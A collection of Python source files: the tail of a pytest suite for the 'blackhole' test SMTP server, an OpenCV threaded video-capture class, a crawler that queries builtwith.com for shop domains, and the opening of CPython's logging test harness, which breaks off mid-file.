conf.mailname = "blackhole.io"
_server = self.loop.create_server(lambda: Smtp([]), sock=self.sock)
self.server = self.loop.run_until_complete(_server)
self.loop.call_soon(ready_event.set)
self.loop.run_forever()
self.server.close()
self.loop.run_until_complete(self.server.wait_closed())
self.loop.close()
self.server = None
def start(self):
ready_event = threading.Event()
self._thread = threading.Thread(target=self._run, args=(ready_event,))
self._thread.daemon = True
self._thread.start()
ready_event.wait()
def stop(self):
assert self._thread is not None, "SMTP daemon not running"
self.loop.call_soon_threadsafe(self._stop)
self._thread.join()
self._thread = None
def _stop(self):
self.loop.stop()
for task in asyncio.all_tasks(self.loop):
task.cancel()
@pytest.mark.usefixtures("reset", "cleandir")
@pytest.mark.asyncio
async def test_mode_directive(event_loop, unused_tcp_port):
cfile = create_config(("listen=:{} mode=bounce".format(unused_tcp_port),))
conf = Config(cfile).load()
sock = _socket("127.0.0.1", unused_tcp_port, socket.AF_INET)
controller = Controller(sock)
controller.start()
conf.flags_from_listener("127.0.0.1", unused_tcp_port)
host, port = sock.getsockname()
with SMTP(host, port) as client:
msg = [
"From: kura@example.com",
"To: kura@example.com",
"Subject: Test",
"X-Blackhole-Mode: accept",
"X-Blackhole-Delay: 5",
"",
"Testing 1, 2, 3",
]
msg = "\n".join(msg)
start = time.time()
code, resp = client.data(msg.encode("utf-8"))
stop = time.time()
assert code in [450, 451, 452, 458, 521, 550, 551, 552, 553, 571]
assert round(stop - start) in (0, 1)
controller.stop()
@pytest.mark.usefixtures("reset", "cleandir")
@pytest.mark.asyncio
@pytest.mark.slow
async def test_delay_directive(event_loop, unused_tcp_port):
cfile = create_config(("listen=:{} delay=5".format(unused_tcp_port),))
conf = Config(cfile).load()
sock = _socket("127.0.0.1", unused_tcp_port, socket.AF_INET)
controller = Controller(sock)
controller.start()
conf.flags_from_listener("127.0.0.1", unused_tcp_port)
host, port = sock.getsockname()
with SMTP(host, port) as client:
msg = [
"From: kura@example.com",
"To: kura@example.com",
"Subject: Test",
"X-Blackhole-Mode: bounce",
"X-Blackhole-Delay: 30",
"",
"Testing 1, 2, 3",
]
msg = "\n".join(msg)
start = time.time()
code, resp = client.data(msg.encode("utf-8"))
stop = time.time()
assert code == 250
assert round(stop - start) in (4, 5, 6)
controller.stop()
@pytest.mark.usefixtures("reset", "cleandir")
@pytest.mark.asyncio
@pytest.mark.slow
async def test_mode_and_delay_directive(event_loop, unused_tcp_port):
cfile = create_config(
("listen=:{} delay=5 mode=bounce".format(unused_tcp_port),),
)
conf = Config(cfile).load()
sock = _socket("127.0.0.1", unused_tcp_port, socket.AF_INET)
controller = Controller(sock)
controller.start()
conf.flags_from_listener("127.0.0.1", unused_tcp_port)
host, port = sock.getsockname()
with SMTP(host, port) as client:
msg = [
"From: kura@example.com",
"To: kura@example.com",
"Subject: Test",
"X-Blackhole-Mode: accept",
"X-Blackhole-Delay: 30",
"",
"Testing 1, 2, 3",
]
msg = "\n".join(msg)
start = time.time()
code, resp = client.data(msg.encode("utf-8"))
stop = time.time()
assert code in [450, 451, 452, 458, 521, 550, 551, 552, 553, 571]
assert round(stop - start) in (4, 5, 6)
controller.stop()
@pytest.mark.usefixtures("reset", "cleandir")
@pytest.mark.asyncio
@pytest.mark.slow
async def test_timeout(event_loop):
cfile = create_config(("timeout=5",))
Config(cfile).load()
controller = Controller()
controller.start()
host, port = controller.sock.getsockname()
with SMTP(host, port) as client:
await asyncio.sleep(8)
code, resp = client.helo("example.com")
assert code == 421
assert resp == b"Timeout"
controller.stop()
@pytest.mark.usefixtures("reset", "cleandir")
@pytest.mark.asyncio
@pytest.mark.slow
async def test_delay(event_loop):
cfile = create_config(("timeout=10",))
Config(cfile).load()
controller = Controller()
controller.start()
host, port = controller.sock.getsockname()
with SMTP(host, port) as client:
msg = [
"From: kura@example.com",
"To: kura@example.com",
"Subject: Test",
"X-Blackhole-Mode: accept",
"X-Blackhole-Delay: 5",
"",
"Testing 1, 2, 3",
]
msg = "\n".join(msg)
start = time.time()
code, resp = client.data(msg.encode("utf-8"))
stop = time.time()
assert code == 250
assert resp.startswith(b"2.0.0 OK: queued as")
assert round(stop - start) in (4, 5, 6)
controller.stop()
@pytest.mark.usefixtures("reset", "cleandir")
@pytest.mark.asyncio
@pytest.mark.slow
async def test_delayed_bounce(event_loop):
cfile = create_config(("timeout=10",))
Config(cfile).load()
controller = Controller()
controller.start()
host, port = controller.sock.getsockname()
with SMTP(host, port) as client:
msg = [
"From: kura@example.com",
"To: kura@example.com",
"Subject: Test",
"X-Blackhole-Mode: bounce",
"X-Blackhole-Delay: 5",
"",
"Testing 1, 2, 3",
]
msg = "\n".join(msg)
start = time.time()
code, resp = client.data(msg.encode("utf-8"))
stop = time.time()
assert code in [450, 451, 452, 458, 521, 550, 551, 552, 553, 571]
assert round(stop - start) in (4, 5, 6)
controller.stop()
@pytest.mark.usefixtures("reset", "cleandir")
@pytest.mark.asyncio
@pytest.mark.slow
async def test_delay_range(event_loop):
cfile = create_config(("timeout=10",))
Config(cfile).load()
controller = Controller()
controller.start()
host, port = controller.sock.getsockname()
with SMTP(host, port) as client:
msg = [
"From: kura@example.com",
"To: kura@example.com",
"Subject: Test",
"X-Blackhole-Mode: accept",
"X-Blackhole-Delay: 2, 4",
"",
"Testing 1, 2, 3",
]
msg = "\n".join(msg)
start = time.time()
code, resp = client.data(msg.encode("utf-8"))
stop = time.time()
assert code == 250
assert resp.startswith(b"2.0.0 OK: queued as")
assert round(stop - start) in (2, 3, 4)
controller.stop()
@pytest.mark.usefixtures("reset", "cleandir")
class TestSmtp(unittest.TestCase):
def setUp(self):
cfile = create_config(("timeout=5", "max_message_size=1024"))
Config(cfile).load()
controller = Controller()
controller.start()
self.host, self.port = controller.sock.getsockname()
self.addCleanup(controller.stop)
def test_helo(self):
with SMTP(self.host, self.port) as client:
code, resp = client.helo("example.com")
assert code == 250
assert resp == b"OK"
def test_ehlo(self):
with SMTP(self.host, self.port) as client:
code, resp = client.ehlo("example.com")
assert code == 250
eresp = (
"blackhole.io",
"HELP",
"PIPELINING",
"AUTH CRAM-MD5 LOGIN PLAIN",
"SIZE 1024",
"VRFY",
"ETRN",
"ENHANCEDSTATUSCODES",
"8BITMIME",
"SMTPUTF8",
"EXPN",
"DSN",
)
assert resp == "\n".join(eresp).encode("utf-8")
def test_mail(self):
with SMTP(self.host, self.port) as client:
code, resp = client.mail("kura@example.com")
assert code == 250
assert resp == b"2.1.0 OK"
def test_mail_size_ok(self):
with SMTP(self.host, self.port) as client:
code, resp = client.mail("kura@example.com SIZE=1")
assert code == 250
assert resp == b"2.1.0 OK"
def test_mail_size_ok_and_mime(self):
with SMTP(self.host, self.port) as client:
code, resp = client.mail("kura@example.com SMTPUTF8 SIZE=1024")
assert code == 250
assert resp == b"2.1.0 OK"
with SMTP(self.host, self.port) as client:
code, resp = client.mail("kura@example.com BODY=7BIT SIZE=1024")
assert code == 250
assert resp == b"2.1.0 OK"
with SMTP(self.host, self.port) as client:
code, resp = client.mail(
"kura@example.com BODY=8BITMIME SIZE=1024",
)
assert code == 250
assert resp == b"2.1.0 OK"
def test_mail_size_too_large(self):
with SMTP(self.host, self.port) as client:
msg = "MAIL FROM: kura@example.com SIZE=10240"
code, resp = client.docmd(msg)
assert code == 552
assert resp == b"Message size exceeds fixed maximum message size"
def test_mail_size_too_large_and_mime(self):
with SMTP(self.host, self.port) as client:
msg = "MAIL FROM: kura@example.com SMTPUTF8 SIZE=10240"
code, resp = client.docmd(msg)
assert code == 552
assert resp == b"Message size exceeds fixed maximum message size"
with SMTP(self.host, self.port) as client:
msg = "MAIL FROM: kura@example.com BODY=7BIT SIZE=10240"
code, resp = client.docmd(msg)
assert code == 552
assert resp == b"Message size exceeds fixed maximum message size"
with SMTP(self.host, self.port) as client:
msg = "MAIL FROM: kura@example.com BODY=8BITMIME SIZE=10240"
code, resp = client.docmd(msg)
assert code == 552
assert resp == b"Message size exceeds fixed maximum message size"
def test_mail_smtputf8(self):
with SMTP(self.host, self.port) as client:
code, resp = client.docmd("MAIL FROM: kura@example.com SMTPUTF8")
assert code == 250
assert resp == b"2.1.0 OK"
def test_mail_7bit(self):
with SMTP(self.host, self.port) as client:
code, resp = client.docmd("MAIL FROM: kura@example.com BODY=7BIT")
assert code == 250
assert resp == b"2.1.0 OK"
def test_mail_8bitmime(self):
with SMTP(self.host, self.port) as client:
msg = "MAIL FROM: kura@example.com BODY=8BITMIME"
code, resp = client.docmd(msg)
assert code == 250
assert resp == b"2.1.0 OK"
def test_rcpt(self):
with SMTP(self.host, self.port) as client:
code, resp = client.rcpt("kura@example.com")
assert code == 250
assert resp == b"2.1.5 OK"
def test_data(self):
with SMTP(self.host, self.port) as client:
code, resp = client.data(b"testing 1, 2, 3")
assert code == 250
assert resp.startswith(b"2.0.0 OK: queued as")
def test_data_too_large(self):
with SMTP(self.host, self.port) as client:
msg = "".join(
random.choice(string.ascii_letters + string.digits)
for x in range(2048)
)
code, resp = client.data(msg)
assert code == 552
assert resp == b"Message size exceeds fixed maximum message size"
def test_data_fail(self):
with SMTP(self.host, self.port) as client:
msg = [
"From: kura@example.com",
"To: kura@example.com",
"Subject: Test",
"X-Blackhole-Mode: bounce",
"",
"Testing 1, 2, 3",
]
msg = "\n".join(msg)
code, resp = client.data(msg.encode("utf-8"))
assert code in [450, 451, 452, 458, 521, 550, 551, 552, 553, 571]
def test_data_random(self):
with SMTP(self.host, self.port) as client:
msg = [
"From: kura@example.com",
"To: kura@example.com",
"Subject: Test",
"X-Blackhole-Mode: random",
"",
"Testing 1, 2, 3",
]
msg = "\n".join(msg)
code, resp = client.data(msg.encode("utf-8"))
assert code in [
250,
450,
451,
452,
458,
521,
550,
551,
552,
553,
571,
]
def test_data_accept(self):
with SMTP(self.host, self.port) as client:
msg = [
"From: kura@example.com",
"To: kura@example.com",
"Subject: Test",
"X-Blackhole-Mode: accept",
"",
"Testing 1, 2, 3",
]
msg = "\n".join(msg)
code, resp = client.data(msg.encode("utf-8"))
assert code == 250
assert resp.startswith(b"2.0.0 OK: queued as")
def test_rset(self):
with SMTP(self.host, self.port) as client:
code, resp = client.rset()
assert code == 250
assert resp == b"2.0.0 OK"
def test_noop(self):
with SMTP(self.host, self.port) as client:
code, resp = client.noop()
assert code == 250
assert resp == b"2.0.0 OK"
def test_vrfy(self):
with SMTP(self.host, self.port) as client:
code, resp = client.verify("kura@example.com")
assert code == 252
assert resp == b"2.0.0 Will attempt delivery"
def test_vrfy_pass(self):
with SMTP(self.host, self.port) as client:
code, resp = client.verify("pass=kura@example.com")
assert code == 250
assert resp == b"2.0.0 <pass=kura@example.com> OK"
def test_vrfy_fail(self):
with SMTP(self.host, self.port) as client:
code, resp = client.verify("fail=kura@example.com")
assert code == 550
assert resp == b"5.7.1 <fail=kura@example.com> unknown"
def test_expn_no_list(self):
with SMTP(self.host, self.port) as client:
code, resp = client.expn("")
assert code == 550
assert resp == b"Not authorised"
def test_expn_fail(self):
with SMTP(self.host, self.port) as client:
code, resp = client.expn("fail=kura@example.com")
assert code == 550
assert resp == b"Not authorised"
def test_expn_list1(self):
with SMTP(self.host, self.port) as client:
code, resp = client.expn("list1")
eresp = (
"Shadow <shadow@blackhole.io>",
"Wednesday <wednesday@blackhole.io>",
"Low-key Liesmith <low-key.liesmith@blackhole.io>",
)
assert code == 250
assert resp == "\n".join(eresp).encode("utf-8")
def test_expn_list2(self):
with SMTP(self.host, self.port) as client:
code, resp = client.expn("list2")
eresp = (
"Jim Holden <jim.holden@blackhole.io>",
"Naomi Nagata <naomi.nagata@blackhole.io>",
"Alex Kamal <alex.kamal@blackhole.io>",
"Amos Burton <amos.burton@blackhole.io>",
)
assert code == 250
assert resp == "\n".join(eresp).encode("utf-8")
def test_expn_list3(self):
with SMTP(self.host, self.port) as client:
code, resp = client.expn("list3")
eresp = (
"Takeshi Kovacs <takeshi.kovacs@blackhole.io>",
"Laurens Bancroft <laurens.bancroft@blackhole.io>",
"Kristin Ortega <kristin.ortega@blackhole.io>",
"Quellcrist Falconer <quellcrist.falconer@blackhole.io>",
"Virginia Vidaura <virginia.vidaura@blackhole.io>",
"Reileen Kawahara <reileen.kawahara@blackhole.io>",
)
assert code == 250
assert resp == "\n".join(eresp).encode("utf-8")
def test_expn_all(self):
with SMTP(self.host, self.port) as client:
code, resp = client.expn("all")
eresp = (
"Takeshi Kovacs <takeshi.kovacs@blackhole.io>",
"Laurens Bancroft <laurens.bancroft@blackhole.io>",
"Kristin Ortega <kristin.ortega@blackhole.io>",
"Quellcrist Falconer <quellcrist.falconer@blackhole.io>",
"Virginia Vidaura <virginia.vidaura@blackhole.io>",
"Reileen Kawahara <reileen.kawahara@blackhole.io>",
"Jim Holden <jim.holden@blackhole.io>",
"Naomi Nagata <naomi.nagata@blackhole.io>",
"Alex Kamal <alex.kamal@blackhole.io>",
"Amos Burton <amos.burton@blackhole.io>",
"Shadow <shadow@blackhole.io>",
"Wednesday <wednesday@blackhole.io>",
"Low-key Liesmith <low-key.liesmith@blackhole.io>",
)
assert code == 250
resps = resp.decode("utf-8").split("\n")
assert sorted(resps) == sorted(eresp)
def test_etrn(self):
with SMTP(self.host, self.port) as client:
code, resp = client.docmd("ETRN")
assert code == 250
assert resp == b"Queueing started"
def test_quit(self):
with SMTP(self.host, self.port) as client:
code, resp = client.quit()
assert code == 221
assert resp == b"2.0.0 Goodbye"
def test_starttls(self):
with SMTP(self.host, self.port) as client:
with pytest.raises(SMTPNotSupportedError):
code, resp = client.starttls()
code, resp = client.docmd("STARTTLS")
assert code == 500
assert resp == b"Not implemented"
def test_unknown(self):
with SMTP(self.host, self.port) as client:
code, resp = client.docmd("KURA")
assert code == 502
assert resp == b"5.5.2 Command not recognised"
def test_help(self):
with SMTP(self.host, self.port) as client:
eresp = (
"Supported commands: AUTH DATA EHLO ETRN EXPN HELO MAIL "
"NOOP QUIT RCPT RSET VRFY"
)
assert client.help() == eresp.encode("utf-8")
def test_help_auth(self):
with SMTP(self.host, self.port) as client:
resp = client.help("AUTH")
assert resp == b"Syntax: AUTH CRAM-MD5 LOGIN PLAIN"
def test_help_data(self):
with SMTP(self.host, self.port) as client:
resp = client.help("DATA")
assert resp == b"Syntax: DATA"
def test_help_ehlo(self):
with SMTP(self.host, self.port) as client:
resp = client.help("EHLO")
assert resp == b"Syntax: EHLO domain.tld"
def test_help_etrn(self):
with SMTP(self.host, self.port) as client:
resp = client.help("ETRN")
assert resp == b"Syntax: ETRN"
def test_help_expn(self):
with SMTP(self.host, self.port) as client:
resp = client.help("EXPN")
assert resp == b"Syntax: EXPN <list1 | list2 | list3 | all>"
def test_help_helo(self):
with SMTP(self.host, self.port) as client:
resp = client.help("HELO")
assert resp == b"Syntax: HELO domain.tld"
def test_help_mail(self):
with SMTP(self.host, self.port) as client:
resp = client.help("MAIL")
assert resp == b"Syntax: MAIL FROM: <address>"
def test_help_noop(self):
with SMTP(self.host, self.port) as client:
resp = client.help("NOOP")
assert resp == b"Syntax: NOOP"
def test_help_quit(self):
with SMTP(self.host, self.port) as client:
resp = client.help("QUIT")
assert resp == b"Syntax: QUIT"
def test_help_rcpt(self):
with SMTP(self.host, self.port) as client:
resp = client.help("RCPT")
assert resp == b"Syntax: RCPT TO: <address>"
def test_help_rset(self):
with SMTP(self.host, self.port) as client:
resp = client.help("RSET")
assert resp == b"Syntax: RSET"
def test_help_unknown(self):
with SMTP(self.host, self.port) as client:
code, resp = client.docmd("HELP", "KURA")
eresp = (
"Supported commands: AUTH DATA EHLO ETRN EXPN HELO MAIL "
"NOOP QUIT RCPT RSET VRFY"
)
assert code == 501
assert resp == eresp.encode("utf-8")
def test_help_vrfy(self):
with SMTP(self.host, self.port) as client:
resp = client.help("VRFY")
assert resp == b"Syntax: VRFY <address>"
def test_auth_login(self):
with SMTP(self.host, self.port) as client:
code, resp = client.docmd("AUTH", "LOGIN")
assert code == 334
assert resp == b"VXNlcm5hbWU6"
code, resp = client.docmd("test")
assert code == 235
assert resp == b"2.7.0 Authentication successful"
def test_auth_login_fail(self):
with SMTP(self.host, self.port) as client:
code, resp = client.docmd("AUTH", "LOGIN")
assert code == 334
assert resp == b"VXNlcm5hbWU6"
code, resp = client.docmd("fail=test")
assert code == 535
assert resp == b"5.7.8 Authentication failed"
def test_auth_login_pass(self):
with SMTP(self.host, self.port) as client:
code, resp = client.docmd("AUTH", "LOGIN")
assert code == 334
assert resp == b"VXNlcm5hbWU6"
code, resp = client.docmd("pass=test")
assert code == 235
assert resp == b"2.7.0 Authentication successful"
def test_auth_cram_md5(self):
with SMTP(self.host, self.port) as client:
client.user = "test"
client.password = "test"
code, resp = client.auth("CRAM-MD5", client.auth_cram_md5)
assert code == 235
assert resp == b"2.7.0 Authentication successful"
def test_auth_cram_md5_fail(self):
with SMTP(self.host, self.port) as client:
code, resp = client.docmd("AUTH", "CRAM-MD5")
assert code == 334
code, resp = client.docmd("fail=test")
assert code == 535
assert resp == b"5.7.8 Authentication failed"
def test_auth_cram_md5_pass(self):
with SMTP(self.host, self.port) as client:
code, resp = client.docmd("AUTH", "CRAM-MD5")
assert code == 334
code, resp = client.docmd("pass=test")
assert code == 235
assert resp == b"2.7.0 Authentication successful"
def test_auth_plain(self):
with SMTP(self.host, self.port) as client:
client.user = "test"
client.password = "test"
code, resp = client.auth("PLAIN", client.auth_plain)
assert code == 235
assert resp == b"2.7.0 Authentication successful"
def test_auth_plain_fail(self):
with SMTP(self.host, self.port) as client:
code, resp = client.docmd("AUTH", "PLAIN")
assert code == 334
code, resp = client.docmd("fail=test")
assert code == 535
assert resp == b"5.7.8 Authentication failed"
def test_auth_plain_pass(self):
with SMTP(self.host, self.port) as client:
with SMTP(self.host, self.port) as client:
code, resp = client.docmd("AUTH", "PLAIN")
assert code == 334
code, resp = client.docmd("pass=test")
assert code == 235
assert resp == b"2.7.0 Authentication successful"
def test_auth_plain_fail_oneline(self):
with SMTP(self.host, self.port) as client:
code, resp = client.docmd("AUTH", "PLAIN fail=test")
assert code == 535
assert resp == b"5.7.8 Authentication failed"
def test_auth_plain_pass_oneline(self):
with SMTP(self.host, self.port) as client:
with SMTP(self.host, self.port) as client:
code, resp = client.docmd("AUTH", "PLAIN pass=test")
assert code == 235
assert resp == b"2.7.0 Authentication successful"
def test_auth_unknown(self):
with SMTP(self.host, self.port) as client:
code, resp = client.docmd("AUTH", "KURA")
assert code == 501
assert resp == b"5.5.4 Syntax: AUTH mechanism"
def test_too_many_unknown_commands(self):
with SMTP(self.host, self.port) as client, pytest.raises(
SMTPServerDisconnected,
):
for _ in range(11):
code, resp = client.docmd("KURA")
assert code == 502
assert resp == b"5.5.3 Too many unknown commands"
|
capture.py | import time
import cv2
from threading import Thread
class VideoCapture:
def __init__(self, src):
self.frame = None
self.src = src
self.capture = cv2.VideoCapture(src)
self.thread = Thread(target=self._read_frames)
def __iter__(self):
self.start()
time.sleep(3)
return self
def __next__(self):
frame = self.get_frame()
if frame is None:
raise StopIteration
return frame
def _read_frames(self):
while 1:
ret, frame = self.capture.read()
if not ret:
break
self.frame = frame[:, :, ::-1]
def start(self):
if not self.capture.isOpened():
self.capture = cv2.VideoCapture(self.src)
self.thread.start()
def stop(self):
self.capture.release()
def get_frame(self):
if not self.capture.isOpened():
return None
return self.frame.copy()
|
main.py | import threading
from queue import Queue
from spider import Spider
from domain import *
from general import *
ALL_OF_MY_CATEGORYS = read_file('category.txt')
HOW_MANY_CATEGORYS_I_READ = []
for i in ALL_OF_MY_CATEGORYS:
shop_names = shops_name_in_there(i.split('\n')[0])
j = 0
PROJECT_NAME = i.split('\n')[0]
HOMEPAGE = []
while j < how_many_shop_is_there(i.split('\n')[0]):
shop_name = shop_names.iloc[j]['Shops']
a = shop_name
if shop_name.find('www') >-1:
shop_name = shop_name[shop_name.find('www'):]
if shop_name.find('/')>-1:
shop_name = shop_name[shop_name.find('www'):shop_name.find('/')]
else:
shop_name = shop_name[shop_name.find('www'):]
elif shop_name.find('http://')>-1:
shop_name = shop_name[shop_name.find('http://')+7:]
if shop_name.find('/')>-1:
shop_name = shop_name[:shop_name.find('/')]
else:
shop_name = shop_name
elif shop_name.find('https://')>-1:
shop_name = shop_name[shop_name.find('https://')+8:]
if shop_name.find('/')>-1:
shop_name = shop_name[:shop_name.find('/')]
else:
shop_name = shop_name
HOMEPAGE.append('https://builtwith.com/{}'.format(shop_name))
j = j +1
DOMAIN_NAME = get_domain_name('https://builtwith.com')
QUEUE_FILE = PROJECT_NAME + '/queue.txt'
CRAWLED_FILE = PROJECT_NAME + '/crawled.txt'
NUMBER_OF_THREADS = 8
queue = Queue()
Spider(PROJECT_NAME, HOMEPAGE, DOMAIN_NAME)
# # Create worker threads (will die when main exits)
# def create_workers():
# for _ in range(NUMBER_OF_THREADS):
# t = threading.Thread(target=work)
# t.daemon = True
# t.start()
# # Do the next job in the queue
# def work():
# while True:
# url = queue.get()
# Spider.crawl_page(threading.current_thread().name, url)
# queue.task_done()
# # Each queued link is a new job
# def create_jobs():
# for categoty in ALL_OF_MY_CATEGORYS:
# HOW_MANY_CATEGORYS_I_READ.append(categoty)
# crawl()
# # Check if there are items in the queue, if so crawl them
# def crawl():
# if len(ALL_OF_MY_CATEGORYS)>0:
# print('how many categotys left = ' + str(ALL_OF_MY_CATEGORYS))
# create_jobs()
# create_workers()
# crawl()
|
test_logging.py | # Copyright 2001-2019 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Test harness for the logging module. Run all tests.
Copyright (C) 2001-2019 Vinay Sajip. All Rights Reserved.
"""
import logging
import logging.handlers
import logging.config
import codecs
import configparser
import copy
import datetime
import pathlib
import pickle
import io
import gc
import json
import os
import queue
import random
import re
import signal
import socket
import struct
import sys
import tempfile
from test.support.script_helper import assert_python_ok, assert_python_failure
from test import support
import textwrap
import threading
import time
import unittest
import warnings
import weakref
import asyncore
from http.server import HTTPServer, BaseHTTPRequestHandler
import smtpd
from urllib.parse import urlparse, parse_qs
from socketserver import (ThreadingUDPServer, DatagramRequestHandler,
ThreadingTCPServer, StreamRequestHandler)
try:
import win32evtlog, win32evtlogutil, pywintypes
except ImportError:
win32evtlog = win32evtlogutil = pywintypes = None
try:
import zlib
except ImportError:
pass
class BaseTest(unittest.TestCase):
"""Base class for logging tests."""
log_format = "%(name)s -> %(levelname)s: %(message)s"
expected_log_pat = r"^([\w.]+) -> (\w+): (\d+)$"
message_num = 0
def setUp(self):
"""Setup the default logging stream to an internal StringIO instance,
so that we can examine log output as we want."""
self._threading_key = support.threading_setup()
logger_dict = logging.getLogger().manager.loggerDict
logging._acquireLock()
try:
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.saved_loggers = saved_loggers = logger_dict.copy()
self.saved_name_to_level = logging._nameToLevel.copy()
self.saved_level_to_name = logging._levelToName.copy()
self.logger_states = logger_states = {}
for name in saved_loggers:
logger_states[name] = getattr(saved_loggers[name],
'disabled', None)
finally:
logging._releaseLock()
# Set two unused loggers
self.logger1 = logging.getLogger("\xab\xd7\xbb")
self.logger2 = logging.getLogger("\u013f\u00d6\u0047")
self.root_logger = logging.getLogger("")
self.original_logging_level = self.root_logger.getEffectiveLevel()
self.stream = io.StringIO()
self.root_logger.setLevel(logging.DEBUG)
self.root_hdlr = logging.StreamHandler(self.stream)
self.root_formatter = logging.Formatter(self.log_format)
self.root_hdlr.setFormatter(self.root_formatter)
if self.logger1.hasHandlers():
hlist = self.logger1.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
if self.logger2.hasHandlers():
hlist = self.logger2.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
self.root_logger.addHandler(self.root_hdlr)
self.assertTrue(self.logger1.hasHandlers())
self.assertTrue(self.logger2.hasHandlers())
def tearDown(self):
"""Remove our logging stream, and restore the original logging
level."""
self.stream.close()
self.root_logger.removeHandler(self.root_hdlr)
while self.root_logger.handlers:
h = self.root_logger.handlers[0]
self.root_logger.removeHandler(h)
h.close()
self.root_logger.setLevel(self.original_logging_level)
logging._acquireLock()
try:
logging._levelToName.clear()
logging._levelToName.update(self.saved_level_to_name)
logging._nameToLevel.clear()
logging._nameToLevel.update(self.saved_name_to_level)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
manager = logging.getLogger().manager
manager.disable = 0
loggerDict = manager.loggerDict
loggerDict.clear()
loggerDict.update(self.saved_loggers)
logger_states = self.logger_states
for name in self.logger_states:
if logger_states[name] is not None:
self.saved_loggers[name].disabled = logger_states[name]
finally:
logging._releaseLock()
self.doCleanups()
support.threading_cleanup(*self._threading_key)
def assert_log_lines(self, expected_values, stream=None, pat=None):
"""Match the collected log lines against the regular expression
self.expected_log_pat, and compare the extracted group values to
the expected_values list of tuples."""
stream = stream or self.stream
pat = re.compile(pat or self.expected_log_pat)
actual_lines = stream.getvalue().splitlines()
self.assertEqual(len(actual_lines), len(expected_values))
for actual, expected in zip(actual_lines, expected_values):
match = pat.search(actual)
if not match:
self.fail("Log line does not match expected pattern:\n" +
actual)
self.assertEqual(tuple(match.groups()), expected)
s = stream.read()
if s:
self.fail("Remaining output at end of log stream:\n" + s)
def next_message(self):
"""Generate a message consisting solely of an auto-incrementing
integer."""
self.message_num += 1
return "%d" % self.message_num
class BuiltinLevelsTest(BaseTest):
"""Test builtin levels and their inheritance."""
def test_flat(self):
# Logging levels in a flat logger namespace.
m = self.next_message
ERR = logging.getLogger("ERR")
ERR.setLevel(logging.ERROR)
INF = logging.LoggerAdapter(logging.getLogger("INF"), {})
INF.setLevel(logging.INFO)
DEB = logging.getLogger("DEB")
DEB.setLevel(logging.DEBUG)
# These should log.
ERR.log(logging.CRITICAL, m())
ERR.error(m())
INF.log(logging.CRITICAL, m())
INF.error(m())
INF.warning(m())
INF.info(m())
DEB.log(logging.CRITICAL, m())
DEB.error(m())
DEB.warning(m())
DEB.info(m())
DEB.debug(m())
# These should not log.
ERR.warning(m())
ERR.info(m())
ERR.debug(m())
INF.debug(m())
self.assert_log_lines([
('ERR', 'CRITICAL', '1'),
('ERR', 'ERROR', '2'),
('INF', 'CRITICAL', '3'),
('INF', 'ERROR', '4'),
('INF', 'WARNING', '5'),
('INF', 'INFO', '6'),
('DEB', 'CRITICAL', '7'),
('DEB', 'ERROR', '8'),
('DEB', 'WARNING', '9'),
('DEB', 'INFO', '10'),
('DEB', 'DEBUG', '11'),
])
def test_nested_explicit(self):
# Logging levels in a nested namespace, all explicitly set.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
# These should log.
INF_ERR.log(logging.CRITICAL, m())
INF_ERR.error(m())
# These should not log.
INF_ERR.warning(m())
INF_ERR.info(m())
INF_ERR.debug(m())
self.assert_log_lines([
('INF.ERR', 'CRITICAL', '1'),
('INF.ERR', 'ERROR', '2'),
])
def test_nested_inherited(self):
# Logging levels in a nested namespace, inherited from parent loggers.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
INF_UNDEF = logging.getLogger("INF.UNDEF")
INF_ERR_UNDEF = logging.getLogger("INF.ERR.UNDEF")
UNDEF = logging.getLogger("UNDEF")
# These should log.
INF_UNDEF.log(logging.CRITICAL, m())
INF_UNDEF.error(m())
INF_UNDEF.warning(m())
INF_UNDEF.info(m())
INF_ERR_UNDEF.log(logging.CRITICAL, m())
INF_ERR_UNDEF.error(m())
# These should not log.
INF_UNDEF.debug(m())
INF_ERR_UNDEF.warning(m())
INF_ERR_UNDEF.info(m())
INF_ERR_UNDEF.debug(m())
self.assert_log_lines([
('INF.UNDEF', 'CRITICAL', '1'),
('INF.UNDEF', 'ERROR', '2'),
('INF.UNDEF', 'WARNING', '3'),
('INF.UNDEF', 'INFO', '4'),
('INF.ERR.UNDEF', 'CRITICAL', '5'),
('INF.ERR.UNDEF', 'ERROR', '6'),
])
def test_nested_with_virtual_parent(self):
# Logging levels when some parent does not exist yet.
m = self.next_message
INF = logging.getLogger("INF")
GRANDCHILD = logging.getLogger("INF.BADPARENT.UNDEF")
CHILD = logging.getLogger("INF.BADPARENT")
INF.setLevel(logging.INFO)
# These should log.
GRANDCHILD.log(logging.FATAL, m())
GRANDCHILD.info(m())
CHILD.log(logging.FATAL, m())
CHILD.info(m())
# These should not log.
GRANDCHILD.debug(m())
CHILD.debug(m())
self.assert_log_lines([
('INF.BADPARENT.UNDEF', 'CRITICAL', '1'),
('INF.BADPARENT.UNDEF', 'INFO', '2'),
('INF.BADPARENT', 'CRITICAL', '3'),
('INF.BADPARENT', 'INFO', '4'),
])
def test_regression_22386(self):
"""See issue #22386 for more information."""
